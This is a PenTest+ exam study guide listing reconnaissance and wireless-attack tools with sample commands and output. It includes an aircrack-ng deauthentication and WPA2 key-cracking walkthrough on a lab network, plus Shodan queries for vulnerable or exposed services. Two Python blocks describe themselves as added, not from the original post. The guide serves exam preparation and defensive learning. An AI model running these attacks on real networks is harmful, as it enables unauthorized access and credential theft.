
Tool up for the CompTIA PenTest+ PT0-003 exam

Nov 26, 2025

Passing the CompTIA PenTest+ (PT0-003) certification requires a solid understanding of over 70 offensive security tools. Understanding why these tools are used, specific tool syntax and typical output can help you prepare and go into the exam with confidence.

In preparing for the exam, the key study resources that stood out for me were:

  • CompTIA PenTest+ Study Guide: Exam PT0-003 (book) by Mike Chapple, David Seidl, and Robert Shimonski: this laid down the theory, objective by objective.
  • TryHackMe PenTest+ path plus loads of other rooms to target specific tools and attacks.
  • The Complete Pentest+ Course on Simply Cyber Academy. This is a fairly new release, so I picked it up late in my studies. Kudos to Daniel Lowrie for making this material so much fun to learn, thank you!
  • Chris Greer's Udemy course: Nmap for Ethical Hackers - The Ultimate Hands-On Course. Knowing what happens "on the wire" during host enumeration was really useful for me.
  • Getting hands-on with Kali Linux made the difference here. Knowing the tools and syntax inside-out was non-negotiable to get a solid pass.

So roll up your sleeves and tool up...I've got your back!

Tools broken down by domain


Domain 2.0 Tools and Examples

1. Nmap

  • Use Case: Network scanning and service enumeration.

  • Input Example:

    nmap -sV -p 80,443 192.168.1.10
    
  • Output Example:

    PORT    STATE SERVICE VERSION
    80/tcp  open  http    Apache httpd 2.4.41
    443/tcp open  https   OpenSSL 1.1.1
    
    
    | ICMP Code | Meaning                                   | Typical Cause                                         | Nmap Interpretation              |
    |-----------|-------------------------------------------|-------------------------------------------------------|----------------------------------|
    | 0         | Network Unreachable                       | No route to the network                               | Host/network down or unreachable |
    | 1         | Host Unreachable                          | Host not responding, ARP failure, or interface down   | Host down                        |
    | 2         | Protocol Unreachable                      | Protocol not supported at destination                 | Protocol not available           |
    | 3         | Port Unreachable                          | No service bound to that port (common with UDP)       | Port closed                      |
    | 9         | Network Administratively Prohibited       | Firewall/ACL blocking network                         | Filtered                         |
    | 10        | Host Administratively Prohibited          | Firewall/ACL blocking host                            | Filtered                         |
    | 13        | Communication Administratively Prohibited | Firewall/ACL blocking traffic by policy               | Filtered                         |
    
    Closed → When it gets a clear ICMP Port Unreachable (Code 3).
    Filtered → When it gets an ICMP “Administratively Prohibited” (Codes 9, 10, 13) or no response at all.
    Open|Filtered → When it can’t tell if the port is open or filtered (e.g., UDP with no response).
    Down → When ICMP Host/Network Unreachable (Codes 0, 1) persist.
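The state rules above are what Nmap applies per port. The Python below is an added example (not Nmap's own code and not from the original post): it encodes the ICMP rules from the table and separates TCP SYN probes from UDP probes, because the same silence means `filtered` for one and `open|filtered` for the other. The probe results are constructed and the `ProbeResult` / `port_state` / `host_status` names are my own.

```python
"""Classify scan probe replies into Nmap port states.

Added example, not code from the original post or from Nmap: it encodes the
ICMP type 3 rules in the table above (code 3 -> closed, codes 9/10/13 ->
filtered, codes 0/1 persisting -> host down) and distinguishes TCP SYN from
UDP probes. All probe results are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

HOST_OR_NET_UNREACHABLE = {0, 1}        # codes that describe the host/route, not a port
ICMP_REASON = {                          # short tags in the style of nmap --reason
    0: "net-unreach", 1: "host-unreach", 2: "proto-unreach", 3: "port-unreach",
    9: "admin-prohibited", 10: "admin-prohibited", 13: "admin-prohibited",
}


@dataclass
class ProbeResult:
    protocol: str                    # "tcp" (SYN scan) or "udp"
    port: int
    reply: Optional[str]             # "syn-ack", "rst", "udp-data", "icmp", or None for silence
    icmp_code: Optional[int] = None  # ICMP type 3 code, meaningful only when reply == "icmp"


def port_state(r: ProbeResult) -> str:
    """Return the Nmap port state for a single probe result."""
    if r.protocol == "tcp":
        if r.reply == "syn-ack":
            return "open"
        if r.reply == "rst":
            return "closed"
        # Any ICMP unreachable, or no reply at all, means something dropped the SYN.
        return "filtered"
    if r.protocol == "udp":
        if r.reply == "udp-data":
            return "open"            # the service answered, so it is definitely listening
        if r.reply == "icmp":
            # Port Unreachable (code 3) is the only unambiguous "nothing listening" reply;
            # the administratively-prohibited codes mean a filter answered, not the host.
            return "closed" if r.icmp_code == 3 else "filtered"
        # Silence: an open UDP service that ignores our payload looks exactly like a drop.
        return "open|filtered"
    raise ValueError(f"unsupported protocol: {r.protocol}")


def host_status(results: List[ProbeResult]) -> str:
    """'down' when every probe came back as ICMP host/network unreachable (codes 0/1)."""
    if results and all(r.reply == "icmp" and r.icmp_code in HOST_OR_NET_UNREACHABLE
                       for r in results):
        return "down"
    return "up"


def reason(r: ProbeResult) -> str:
    """Explain a state the way nmap --reason would (tags are approximations)."""
    if r.reply is None:
        return "no-response"
    if r.reply == "icmp":
        return ICMP_REASON.get(r.icmp_code, f"icmp-type3-code-{r.icmp_code}")
    return "reset" if r.reply == "rst" else r.reply


def summarize(results: List[ProbeResult]) -> Dict[Tuple[str, int], str]:
    """Map (protocol, port) -> state for a batch of probe results."""
    return {(r.protocol, r.port): port_state(r) for r in results}


# Constructed probe results for one host (not output of a real scan).
SAMPLE = [
    ProbeResult("tcp", 80, "syn-ack"),
    ProbeResult("tcp", 22, "rst"),
    ProbeResult("tcp", 25, "icmp", 13),
    ProbeResult("tcp", 8080, None),
    ProbeResult("udp", 53, "udp-data"),
    ProbeResult("udp", 161, "icmp", 3),
    ProbeResult("udp", 123, None),
    ProbeResult("udp", 500, "icmp", 10),
]

if __name__ == "__main__":
    print("host:", host_status(SAMPLE))
    for r in SAMPLE:
        print(f"{r.port}/{r.protocol:<4} {port_state(r):<14} {reason(r)}")
```

Run it as-is to see the per-port table; the point worth remembering for the exam is that a firewall rejecting with codes 9/10/13 produces `filtered` on both protocols, while only UDP can ever yield `open|filtered`.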
    
    

2. theHarvester

  • Use Case: Collect emails, subdomains, and hosts from public sources. Github

  • Input Example:

    theHarvester -d kali.org -b duckduckgo
    
  • Output Example:

    [*] Target: kali.org

    [*] Searching Duckduckgo.

    [*] No IPs found.

    [*] No emails found.

    [*] Hosts found: 15
    ---------------------
    arm.kali.org:35.185.44.232
    autopkgtest.kali.org:104.18.5.159, 104.18.4.159
    bugs.kali.org:104.18.4.159, 104.18.5.159
    cdimage.kali.org:54.39.128.230
    discord.kali.org:104.18.5.159, 104.18.4.159
    docs.kali.org:104.18.5.159, 104.18.4.159
    forums.kali.org:104.18.5.159, 104.18.4.159
    http.kali.org:54.39.128.230
    nethunter.kali.org:35.185.44.232
    old.kali.org:54.39.49.227
    pkg.kali.org:104.18.5.159, 104.18.4.159
    status.kali.org:104.18.5.159, 104.18.4.159
    www.kali.org:104.18.4.159, 104.18.5.159
    www.kali.org:104.18.5.159, 104.18.4.159
    

3. WHOIS

  • Use Case: Query WHOIS records for domain registration information. WHOIS Protocol RFC

  • Input Example:

    whois tryhackme.com
    
  • Output Example:

     Domain Name: TRYHACKME.COM
     Registry Domain ID: 2282723194_DOMAIN_COM-VRSN
     Registrar WHOIS Server: whois.namecheap.com
     Registrar URL: http://www.namecheap.com
     Updated Date: 2025-05-11T14:06:02Z
     Creation Date: 2018-07-05T19:46:15Z
     Registry Expiry Date: 2034-07-05T19:46:15Z
     Registrar: NameCheap, Inc.
     Registrar IANA ID: 1068
     Registrar Abuse Contact Email: [email protected]
     Registrar Abuse Contact Phone: +1.6613102107
     Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
     Name Server: KIP.NS.CLOUDFLARE.COM
     Name Server: UMA.NS.CLOUDFLARE.COM
     DNSSEC: unsigned
     URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
     >>> Last update of whois database: 2025-11-05T16:27:48Z <<<
     [...]
     Registry Registrant ID: 
     Registrant Name: Redacted for Privacy
     Registrant Organization: Privacy service provided by Withheld for Privacy ehf
     Registrant Street: Kalkofnsvegur 2 
     Registrant City: Reykjavik
     Registrant State/Province: Capital Region
     Registrant Postal Code: 101
     Registrant Country: IS
     [...]
     Admin Email: [email protected]
     [...]
     Tech Email: [email protected]
     [...]
    
    

4. nslookup / dig

  • Use Case: DNS record enumeration. dig / nslookup

  • Input Example:

    nslookup -type=A tryhackme.com 1.1.1.1
    
    nslookup -type=MX tryhackme.com
    
    dig @1.1.1.1 tryhackme.com MX
    
    dig trih4ckme.com
    
  • Output Example:

    
    Server:		1.1.1.1
    Address:	1.1.1.1#53
    
    Non-authoritative answer:
    Name:	tryhackme.com
    Address: 172.66.164.239
    Name:	tryhackme.com
    Address: 104.20.29.66
    
    
    Server:		::1
    Address:	::1#53
    
    Non-authoritative answer:
    tryhackme.com	mail exchanger = 1 aspmx.l.google.com.
    tryhackme.com	mail exchanger = 10 alt3.aspmx.l.google.com.
    tryhackme.com	mail exchanger = 10 alt4.aspmx.l.google.com.
    tryhackme.com	mail exchanger = 5 alt1.aspmx.l.google.com.
    tryhackme.com	mail exchanger = 5 alt2.aspmx.l.google.com.
    Authoritative answers can be found from:
    
    
    ; <<>> DiG 9.18.28-0ubuntu0.20.04.1-Ubuntu <<>> tryhackme.com MX
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13475
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1
    
    ;; OPT PSEUDOSECTION:
    ; EDNS: version: 0, flags:; udp: 1232
    ;; QUESTION SECTION:
    ;tryhackme.com.			IN	MX
    
    ;; ANSWER SECTION:
    tryhackme.com.		300	IN	MX	5 alt1.aspmx.l.google.com.
    tryhackme.com.		300	IN	MX	5 alt2.aspmx.l.google.com.
    tryhackme.com.		300	IN	MX	1 aspmx.l.google.com.
    tryhackme.com.		300	IN	MX	10 alt3.aspmx.l.google.com.
    tryhackme.com.		300	IN	MX	10 alt4.aspmx.l.google.com.
    
    ;; Query time: 4 msec
    ;; SERVER: ::1#53(::1) (UDP)
    ;; WHEN: Wed Nov 05 16:55:22 GMT 2025
    ;; MSG SIZE  rcvd: 157
    
    
    ; <<>> DiG 9.18.28-0ubuntu0.20.04.1-Ubuntu <<>> trih4ckme.com
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 41241
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
    [...]
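Reading dig output by eye is fine for one domain, but the records above are listed in the order the resolver returned them, not in delivery order. The parser below is an added example (not from the original post or from BIND's dig): it pulls the header status and the ANSWER SECTION out of dig's text output, sorts MX records by preference, and returns an empty record list for the NXDOMAIN case. The two sample outputs are copies of the dig runs shown above, stored as constructed strings; `parse_dig_mx` and `delivery_order` are my own names.

```python
"""Parse dig output into structured MX records and a delivery order.

Added example (not from the original post or from BIND's dig). It reads the
header status (NOERROR / NXDOMAIN) and the ANSWER SECTION, returns MX records
sorted by preference, and treats a missing answer section as an empty result.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

STATUS_RE = re.compile(r"status:\s*([A-Z]+)")
# name  ttl  IN  MX  preference  exchange   (fields separated by tabs or spaces)
MX_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+MX\s+(\d+)\s+(\S+)$")


@dataclass
class MxRecord:
    name: str
    ttl: int
    preference: int   # lower value = tried first by a sending MTA
    exchange: str


def parse_dig_mx(output: str) -> Tuple[Optional[str], List[MxRecord]]:
    """Return (status, records); records sorted by preference, then exchange name."""
    status: Optional[str] = None
    records: List[MxRecord] = []
    in_answer = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(";; ->>HEADER<<-"):
            m = STATUS_RE.search(line)
            status = m.group(1) if m else None
            continue
        if line.startswith(";; ANSWER SECTION:"):
            in_answer = True
            continue
        if not line or line.startswith(";"):
            in_answer = False        # a blank line or another ';;' header ends the section
            continue
        if in_answer:
            m = MX_RE.match(line)
            if m:
                records.append(MxRecord(m.group(1), int(m.group(2)), int(m.group(3)), m.group(4)))
    records.sort(key=lambda r: (r.preference, r.exchange))
    return status, records


def delivery_order(records: List[MxRecord]) -> List[str]:
    """Exchanges in the order a sending MTA would try them (lowest preference first)."""
    return [r.exchange for r in sorted(records, key=lambda r: (r.preference, r.exchange))]


# Constructed copies of the dig output shown in the post.
DIG_MX = """\
; <<>> DiG 9.18.28-0ubuntu0.20.04.1-Ubuntu <<>> tryhackme.com MX
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13475
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;tryhackme.com.            IN    MX

;; ANSWER SECTION:
tryhackme.com.        300    IN    MX    5 alt1.aspmx.l.google.com.
tryhackme.com.        300    IN    MX    5 alt2.aspmx.l.google.com.
tryhackme.com.        300    IN    MX    1 aspmx.l.google.com.
tryhackme.com.        300    IN    MX    10 alt3.aspmx.l.google.com.
tryhackme.com.        300    IN    MX    10 alt4.aspmx.l.google.com.

;; Query time: 4 msec
"""

DIG_NXDOMAIN = """\
; <<>> DiG 9.18.28-0ubuntu0.20.04.1-Ubuntu <<>> trih4ckme.com
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 41241
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
"""

if __name__ == "__main__":
    status, records = parse_dig_mx(DIG_MX)
    print(status, delivery_order(records))
    print(parse_dig_mx(DIG_NXDOMAIN))
```

For a real run, pipe `dig @1.1.1.1 tryhackme.com MX` into the parser via stdin; the same loop works for other record types if the regex is widened.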
    
    

5. Amass

  • Use Case: Comprehensive subdomain enumeration via multiple data sources & brute force. User Guide

  • Input Example:

    amass intel -org "Tesla" -asn 394161 -cidr 199.120.0.0/16
    
    amass enum -d kali.org -brute -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
    
    Subcommands:

          amass intel - Discover targets for enumerations
          amass enum  - Perform enumerations and network mapping
          amass viz   - Visualize enumeration results
          amass track - Track differences between enumerations
          amass db    - Manipulate the Amass graph database
    
    
  • Output Example:

    ASN: 394161 - AS394161 - Tesla Motors, Inc.
      8.21.14.0/24
      8.45.124.0/24
      8.47.24.0/24
      8.244.67.0/24
      8.244.131.0/24
      62.67.197.0/24
      199.66.9.0/24
      199.120.48.0/22
      199.120.56.0/24
      [...]  
      66.17.16.0/23
      66.17.30.0/24
      66.17.34.0/23
      66.17.41.0/24
    
    
    mnemosyne.kali.org
    melpomene.kali.org
    dionysus.kali.org
    [...]
    helios.kali.org
    repo.kali.org
    mirror-status.kali.org
    purple.kali.org
    _dc-mx.6c2afe44a632.pkg.kali.org
    
    OWASP Amass v3.20.0                               https://github.com/OWASP/Amass
    --------------------------------------------------------------------------------                                                                                
    83 names discovered - scrape: 1, cert: 48, brute: 20, api: 14
    --------------------------------------------------------------------------------
    ASN: 63949 - LINODE-AP Linode, LLC
          23.92.16.0/20           1    Subdomain Name(s)
          2600:3c00::/30          7    Subdomain Name(s)
          45.33.0.0/17            1    Subdomain Name(s)
          45.56.64.0/18           1    Subdomain Name(s)
          50.116.0.0/18           2    Subdomain Name(s)
    ASN: 13335 - CLOUDFLARENET - Cloudflare, Inc.
          104.16.0.0/14           76   Subdomain Name(s)
          2606:4700::/47          78   Subdomain Name(s)
          8.6.112.0/24            3    Subdomain Name(s)
          8.47.69.0/24            3    Subdomain Name(s)
    ASN: 16276 - OVH
          176.31.0.0/16           2    Subdomain Name(s)
          54.36.0.0/14            8    Subdomain Name(s)
          15.235.0.0/16           2    Subdomain Name(s)
          51.161.0.0/16           2    Subdomain Name(s)
          51.222.0.0/16           3    Subdomain Name(s)
          51.79.0.0/16            1    Subdomain Name(s)
          66.70.128.0/17          2    Subdomain Name(s)
          2001:41d0::/33          3    Subdomain Name(s)
          192.99.0.0/16           1    Subdomain Name(s)
          144.217.0.0/16          4    Subdomain Name(s)
          51.91.0.0/16            1    Subdomain Name(s)
          158.69.0.0/16           1    Subdomain Name(s)
          2607:5300::/32          24   Subdomain Name(s)
    ASN: 3701 - NERONET - Network for Education and Research in Oregon (NERO)
          140.211.0.0/20          6    Subdomain Name(s)
    
    The enumeration has finished
    Discoveries are being migrated into the local database
    

6. Shodan

  • Use Case: Internet-facing device search. List for search filters

  • Input Example: (Web UI or API or CLI)

    shodan init [REDACTED_API_KEY]
    
    shodan host 8.8.8.8
    
    shodan scan submit 45.33.32.156
    
    curl -sG --data-urlencode "key=[REDACTED_API_KEY]" --data-urlencode 'query=has_vuln:true' "https://api.shodan.io/shodan/host/search" | jq '.matches[] | {ip_str, port, transport, org, data}'  
    
    
    Top 10 queries:
    
    # 1. Find exposed SSH servers
    shodan search "port:22"
    
    # 2. FTP servers with anonymous login
    shodan search 'port:21 "Anonymous login allowed"'
    
    # 3. Public Telnet services
    shodan search "port:23"
    
    # 4. Web servers exposing directory listings
    shodan search 'port:80 title:"Index of /"'
    
    # 5. HTTPS servers by certificate common name
    shodan search 'port:443 ssl.cert.subject.cn:"example.com"'
    
    # 6. Apache servers running a specific vulnerable version
    shodan search 'product:"Apache" version:"2.4.49"'
    
    # 7. Exposed MySQL databases
    shodan search 'port:3306 product:"MySQL"'
    
    # 8. Open ElasticSearch instances
    shodan search 'port:9200 product:"ElasticSearch"'
    
    # 9. Public Redis servers
    shodan search 'port:6379 product:"Redis"'
    
    # 10. OpenVPN servers in a specific subnet
    shodan search "net:203.0.113.0/24 port:1194"
    
    
  • Output Example: Images

    
    8.8.8.8
    Hostnames:               dns.google
    City:                    Mountain View
    Country:                 United States
    Organization:            Google LLC
    Updated:                 2025-11-06T10:58:56.804650
    Number of open ports:    2
    
    Ports:
         53/tcp  
         53/udp  
        443/tcp  
        |-- HTTP title: Google Public DNS
        |-- Cert Issuer: C=US, CN=WR2, O=Google Trust Services
        |-- Cert Subject: CN=dns.google
        |-- SSL Versions: -SSLv2, -SSLv3, -TLSv1, -TLSv1.1, TLSv1.2, TLSv1.3
    
    
    
    Starting Shodan scan at 2025-11-06 15:03 - 100 scan credits left
    No open ports found or the host has been recently crawled and cant get scanned again so soon.
    
    

7. Wireshark / tcpdump

  • Use Case: Packet capture and analysis.

  • Input Example:

    tcpdump -i eth0 port 80
    
  • Output Example:

    10:15:23 IP 192.168.1.5 > 192.168.1.10: HTTP GET /index.html
    

8. Aircrack-ng

  • Use Case: Wireless network key cracking. Github

  • Input Example: refer to the De-auth attack walkthrough

    sudo airmon-ng start wlan0
    
    sudo airodump-ng --bssid 70:3A:51:0B:72:3C wlan0mon
    
    sudo airodump-ng --bssid 70:3A:51:0B:72:3C -c 44 --write WirelessHackingTHMDay2_2 wlan0mon
    
    sudo aireplay-ng --deauth 1 -a 70:3A:51:0B:72:3C -c 4E:78:4A:1A:47:52 wlan0mon
    
    sudo aircrack-ng -w passwords.txt -b 70:3A:51:0B:72:3C WirelessHackingTHMDay2_2-01.cap
    
    |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------|
    | Encryption                | Weakness                                   | Attack                                   | Goal                     | Tools                              |
    |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------|
    | WEP (RC4)                 | Weak Initialization Vector (IV) reuse      | - ChopChop (decrypt packets)             | Recover WEP key          | Aircrack-ng suite, Kismet          |
    |                           |                                            | - ARP Replay (inject traffic)            |                          |                                    |
    |                           |                                            | - IV Attack (weak IVs)                   |                          |                                    |  
    |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------|
    | WPA (PSK) – RC4/TKIP      | TKIP design flaws; offline cracking of PSK | Deauth → capture handshake → crack       | Recover WPA PSK          | Aircrack-ng, hcxdumptool, Hashcat  |
    |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------|
    | WPA2 (PSK) – AES CCMP     | Protocol flaw KRACK (key reinstallation);  | Handshake capture + cracking;            | Exploit 4-way handshake  | Aircrack-ng, bettercap, Hashcat,   |
    |                           | PSK can be cracked offline if weak         | KRACK to decrypt/manipulate traffic      | to decrypt traffic       | KRACK scripts                      |
    |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------|
    | WPA/WPA2 Enterprise       | Misconfig (e.g. no cert validation);       | Evil Twin + captive portal credential    | Steal credentials        | hostapd-wpe, eaphammer, fluxion,   |
    | (802.1X/EAP)              | Rogue AP (Evil Twin)                       | phishing; EAP downgrade                  |                          | wifiphisher                        |
    |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------|
    | WPA3 – SAE (Dragonfly)    | More resistant to offline dictionary       | Transition mode/downgrade;               |                          | eaphammer (transition attacks)     |
    | with Perfect Forward      | attacks; watch for downgrade to WPA2       | implementation bugs                      |                          |                                    |
    | Secrecy                   |                                            |                                          |                          |                                    |
    |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------|
    | WPS                       | 8-digit PIN split (4+3) drastically        | Online PIN brute force; Pixie-dust (weak |                          | Reaver, bully, pixiewps            |
    |                           | reduces keyspace                           | PRNG)                                    |                          |                                    |
    |---------------------------|--------------------------------------------|------------------------------------------|--------------------------|------------------------------------|
    
  • Output Example:

     CH 10 ][ Elapsed: 6 s ][ 2025-11-14 11:01

     BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

     70:3A:51:0B:72:3C  -42        7        0    0  44  433   WPA2 CCMP   PSK  THM-Net

     BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes

     70:3A:51:0B:72:3C  4E:78:4A:1A:47:52  -43    0 - 6      0        1


    11:01:33  Created capture file "WirelessHackingTHMDay2_2-01.cap".

    CH 44 ][ Elapsed: 9 mins ][ 2025-11-14 11:11 ][ fixed channel wlan0mon: 157

    BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

    70:3A:51:0B:72:3C  -47  96     3786      274    0  44  433   WPA2 CCMP   PSK  THM-Net

    BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes

    70:3A:51:0B:72:3C  4E:78:4A:1A:47:52  -39    6e- 6      0      704  EAPOL
    
    
    11:09:00  Waiting for beacon frame (BSSID: 70:3A:51:0B:72:3C) on channel 44
    11:09:00  Sending 64 directed DeAuth (code 7). STMAC: [4E:78:4A:1A:47:52] [11|116 ACKs]
    
    
    Reading packets, please wait...
    Opening WirelessHackingTHMDay2_2-01.cap
    Read 5748 packets.
    
    1 potential targets
    
    Aircrack-ng 1.7
    
    [00:02:01] 9936/10001 keys tested (83.46 k/s)
    
    Time left: 0 seconds			99.35%
    
      	KEY FOUND! [ rocketman ]
    
    Master key	: D0 4F 3C [...]
    
    Transient Key	: F8 F8 F8 [...]
    
    EAPOL HMAC	: DF 58 4E [...]
    
    

9. Maltego

  • Use Case: (GUI-based) Visual OSINT and relationship mapping.

  • Input Example: (GUI-based, select “Domain to IP” transform)

  • Output Example: Graph showing domain → IP → related entities.


10. SpiderFoot

  • Use Case: Automated OSINT scanning. Github

  • Input Example: (Web UI or CLI)

    # Load the Web UI
    spiderfoot -l 127.0.0.1:5001
    
    # Scan with specific modules
    spiderfoot -s kali.org -m sfp_dnsresolve,sfp_ipinfo,sfp_bgpview -o tab
    
  • Output Example:

    2025-11-09 17:09:55,960 [INFO] sflib : Scan [B491122F] for 'kali.org' initiated.
    2025-11-09 17:09:56,039 [INFO] sfp_dnsresolve : Identifying aliases for specified target(s)
    2025-11-09 17:09:56,044 [INFO] sfp_dnsresolve : Target aliases identified: [{'type': 'IPV6_ADDRESS', 'value': '2606:4700::6812:59f'}, {'type': 'INTERNET_NAME', 'value': 'kali.org'}, {'type': 'IPV6_ADDRESS', 'value': '2606:4700::6812:49f'}, {'type': 'IP_ADDRESS', 'value': '104.18.5.159'}, {'type': 'IP_ADDRESS', 'value': '104.18.4.159'}]
    2025-11-09 17:09:56,044 [INFO] sflib : sfp_dnsresolve module loaded.
    2025-11-09 17:09:56,129 [INFO] sflib : sfp_ipinfo module loaded.
    2025-11-09 17:09:56,363 [INFO] sflib : sfp_bgpview module loaded.
    2025-11-09 17:09:56,529 [INFO] sflib : sfp__stor_db module loaded.
    2025-11-09 17:09:56,608 [INFO] sflib : sfp__stor_stdout module loaded.
    SpiderFoot UI                   Internet Name                                   kali.org
    SpiderFoot UI                   Domain Name                                     kali.org
    sfp_dnsresolve                  IPv6 Address                                    2606:4700::6812:59f
    2025-11-09 17:09:57,881 [INFO] sflib : Fetching (GET): https://api.bgpview.io/ip/2606:4700::6812:59f (proxy=None, user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0, timeout=5, cookies=None)
    2025-11-09 17:09:57,884 [ERROR] sfp_ipinfo : You enabled sfp_ipinfo but did not set an API key!
    sfp_dnsresolve                  Domain Name                                     kali.org
    sfp_dnsresolve                  IPv6 Address                                    2606:4700::6812:49f
    sfp_dnsresolve                  IP Address                                      104.18.5.159
    sfp_dnsresolve                  IP Address                                      104.18.4.159
    [...]
    2025-11-09 17:10:07,238 [INFO] sf : Scan completed with status FINISHED  
    
    

11. Wayback Machine

  • Use Case: Review historic snapshots to discover old paths, exposed secrets, removed endpoints.

  • Input Example:
    (Web interface or API)

    https://web.archive.org/web/*/example.com/*
    
  • Output Example:

    
    Available snapshots:
    - 2018-05-12 14:22:31  https://example.com/index.html
    - 2020-09-30 09:01:07  https://example.com/home.html
    - 2022-03-11 20:55:12  https://example.com/js/app.min.js
    
    

12. Censys.io

  • Use Case: Internet-wide search of hosts/certs to find exposed services by technology/fingerprint. Generate reports and automate collection updates.

  • Dashboard

  • Censys API Documentation

  • Input Example: (Web UI or API or python SDK)

    # Web UI
    host.services.endpoints.http.headers: (key: "Server" and value: "Apache") and host.location.country: "United Kingdom" 
    
    # Web UI
    # Requires a paid-for account tier
    host.services.vulns.id: *
    
    # API
    curl --request GET --url https://api.platform.censys.io/v3/global/asset/host/45.33.32.156 --header 'accept: application/vnd.censys.api.v3.host.v1+json' --header 'authorization: Bearer [REDACTED]' > censys-scanme.json
    
    # SDK
    import requests

    # host_id is a placeholder: substitute the IP of the asset to look up
    url = "https://api.platform.censys.io/v3/global/asset/host/host_id"

    headers = {
        "accept": "application/vnd.censys.api.v3.host.v1+json",
        "authorization": "Bearer [REDACTED]"
    }

    # Fail loudly on a bad token (401/403) or a rate limit (429) instead of printing an error body
    response = requests.get(url, headers=headers, timeout=10)
    response.raise_for_status()

    print(response.text)
    
  • Output Example: Full JSON results for scanme.nmap.org | Web UI Images

    
    [...]
    "html_tags": [
      	"\u003ctitle\u003eGo ahead and ScanMe!\u003c/title\u003e",
      	"\u003cmeta name=\"viewport\" content=\"width=device-width,initial-scale=1\"\u003e",
      	"\u003cmeta name=\"theme-color\" content=\"#2A0D45\"\u003e",
      	"\u003cMETA NAME=\"ROBOTS\" CONTENT=\"NOARCHIVE\"\u003e"
      ],
      "body_size": 6974,
      "body": "\u003c!DOCTYPE html\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n\u003ctitle\u003eGo ahead and ScanMe!\u003c/title\u003e\n\u003cmeta name=\"viewport\" [...],
      "favicons": [
      	{
      		"size": 529,
      		"name": "http://45.33.32.156/shared/images/tiny-eyeicon.png",
      		"hash_sha256": "f22e309dc81ff661756822b865f2a272a00e54af69a314392b0f16b0cb54df15",
      		"hash_md5": "156515da3c0f7dc6b2493bd5ce43f795",
      		"hash_shodan": 536238901
      	}
      ],
      "html_title": "Go ahead and ScanMe!",
      "body_hash_sha256": "7c6ac262c9cd17bfc9518d4140199e6ae954d1d7422bad53a378ce2868352fe5",
      "body_hash_sha1": "d5bdccd11872e84c7dc05a8c16d0ed2105eeb100",
      "supported_versions": [
      	"HTTP/1.1"
      ] [...]
    
    

13. Hunter.io

  • Use Case: Enumerate emails and patterns for a target domain (useful for credential formats & phishing simulations).

  • Input Example:

    hunter.io search --domain example.com
    
  • Output Example:

    {
      "domain": "example.com",
      "pattern": "{first}.{last}@example.com",
      "emails": [
        {"value": "[email protected]", "source": "LinkedIn"},
        {"value": "[email protected]", "source": "Company blog"}
      ]
    }
    

14. DNSdumpster

  • Use Case: Passive DNS mapping & subdomain discovery with basic host records and visual map. Site / API

  • Input Example:
    (Web UI or API)

    curl -H "X-API-Key: [REDACTED]" https://api.dnsdumpster.com/domain/kali.org
    
  • Output Example: Images

    
    {
    "a": [
      {
        "host": "10year.kali.org",
        "ips": [
          {
            "asn": "13335",
            "asn_name": "CLOUDFLARENET",
            "asn_range": "104.18.0.0/20",
            "banners": {
              "http": {
                "apps": [
                  "Cloudflare"
                ],
                "server": "cloudflare",
                "title": "Direct IP access not allowed "
              },
              "http8080": {
                "apps": [
                  "Cloudflare"
                ],
                "server": "cloudflare",
                "title": "Direct IP access not allowed "
              },
              "ip": "104.18.5.159"
            },
            "country": "unknown",
            "country_code": "??",
            "ip": "104.18.5.159",
            "ptr": ""
          }
        ]
      },
      {
        "host": "aeacus.kali.org",
        "ips": [
          {
            "asn": "16276",
            "asn_name": "OVH, FR",
            "asn_range": "51.222.0.0/16",
            "banners": {
              "ip": "51.222.80.5",
              "ssh": {
                "banner": "SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u6"
              }
            },
            "country": "Canada",
            "country_code": "CA",
            "ip": "51.222.80.5",
            "ptr": "ns576245.ip-51-222-80.net"
          }
        ]
      },
      [...]
    ],
    "total_a_recs": 63,
    "txt": [
      "\"google-site-verification=QO0m_WIzc81XaujadDfsFymI53IwsX4sCt-Tin9ugoI\"",
      "\"mjb3j7d41a5qd3i4qo8j8d9q7g\"",
      "\"v=spf1 a ip4:208.88.127.98 ip4:52.44.83.41 include:_spf.google.com include:sendgrid.net ~all\"",
      "\"MS=2F24AAB1EA3933DA8A05BF4B28C70033E0001820\""
    ]
    }  
